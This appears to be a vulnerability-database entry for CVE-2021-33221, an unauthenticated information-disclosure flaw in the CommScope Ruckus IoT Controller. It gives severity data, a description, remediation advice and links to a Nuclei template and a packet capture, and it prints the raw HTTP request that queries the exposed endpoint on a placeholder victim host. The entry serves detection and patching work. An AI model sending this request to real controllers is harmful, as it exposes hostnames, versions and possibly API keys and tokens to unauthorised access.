🔙 목록으로 돌아가기

CVE-2021-33221: CommScope Ruckus IoT Controller - Information Disclosure

TitleCommScope Ruckus IoT Controller - Information Disclosure
Authorgeeknik
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could result in the exposure of sensitive data, potentially leading to further attacks or unauthorized access.
RemediationApply the latest security patches or updates provided by CommScope to mitigate the information disclosure vulnerability (CVE-2021-33221).
CVSS Score9.8
EPSS Score0.93335
CVE IDCVE-2021-33221
CWE IDCWE-306
Tags cve2021 cve commscope ruckus debug service leak seclists vuln

🔍 Vulnerability Description

CommScope Ruckus IoT Controller is susceptible to information disclosure vulnerabilities because a ‘service details’ API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens).

🌐 HTTP Request

GET /service/v1/service-details HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-33221.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-33221.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A